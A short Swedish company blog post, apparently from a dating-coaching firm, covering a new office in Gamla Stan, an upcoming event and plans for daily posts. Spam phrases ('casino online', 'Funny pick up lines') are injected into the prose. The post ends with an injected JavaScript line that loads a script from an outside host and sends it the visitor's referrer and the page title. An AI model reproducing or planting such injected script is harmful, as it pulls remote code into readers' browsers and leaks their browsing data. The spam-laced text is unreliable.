Tjena gänget, hoppas alla  har det bra idag,

Jag kommer fatta mig kort då jag snart ska bege mig på stan för att köpa en present till frugan som fyller år idag och jag vill hinna med den skimrade solen som oväntat dykt upp över stan idag icon wink Funny pick up lines

I alla fall vi har haft fullt upp idag på CR. Det är lite av en tidig vårstädning. Nya produkter är på G, personalen ska samlas in och dammas av efter julmörkret så att alla är fräscha inför våren. Det är full ös inför fredag då är det dags för  en förkväll med CR. För er som fortfarande inte anmält casino online er så kan ni göra det HÄR.

Vi har oxå ordnat med nytt kontor och numera sitter vi på skeppsbron i Gamla Stan mitt emot ”Pontus by the Sea” Det är en fina lokaler med en riktig mysig konferensrum som bl kommer att testköras för dem som går  intensivhelgen i slutet av februari.

Bloggen har varit väldigt passiv men från och med denna vecka har vi lovat att lägga ut minst ett inlägg varje dag. Idag kommer Daniel skriva om skillnaden med att gå ut ”full eller nykter”. Daniel är hemma sjuk, men han har lovat att lägga ut den senare ikväll.

Här får ni lite småtugg så länge.Funny pick up lines

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;